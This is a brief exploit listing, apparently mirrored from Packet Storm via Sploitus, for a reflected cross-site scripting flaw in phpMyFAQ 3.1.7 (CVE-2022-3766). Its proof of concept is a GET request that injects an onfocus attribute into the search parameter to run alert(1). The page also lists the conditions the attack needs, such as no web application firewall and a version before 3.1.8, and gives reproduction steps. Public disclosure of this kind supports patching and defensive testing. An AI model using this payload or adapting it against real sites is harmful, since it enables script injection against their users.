Share
## https://sploitus.com/exploit?id=PACKETSTORM:212372
# Exploit Title: phpMyFAQ  3.1.7 - Reflected Cross-Site Scripting (XSS) 
    # Date: 2025-11-25
    # Exploit Author: CodeSecLab
    # Vendor Homepage: https://github.com/thorsten/phpmyfaq/
    # Software Link: https://github.com/thorsten/phpmyfaq/
    # Version: 3.1.7 
    # Tested on: Windows
    # CVE : CVE-2022-3766
    
    
    Proof Of Concept
    GET http://phpmyfaq1/index.php?action=main&search=%22%20onfocus%3D%22alert%281%29
    
    Additional Conditions:
    - Ensure that no security mechanisms (like a web application firewall) are blocking the specific request pattern.
    - The application must be running a phpMyFAQ version prior to 3.1.8.
    
    
    Steps to Reproduce
    Log in phpmyfaq.
    Send the request.
    Observe the result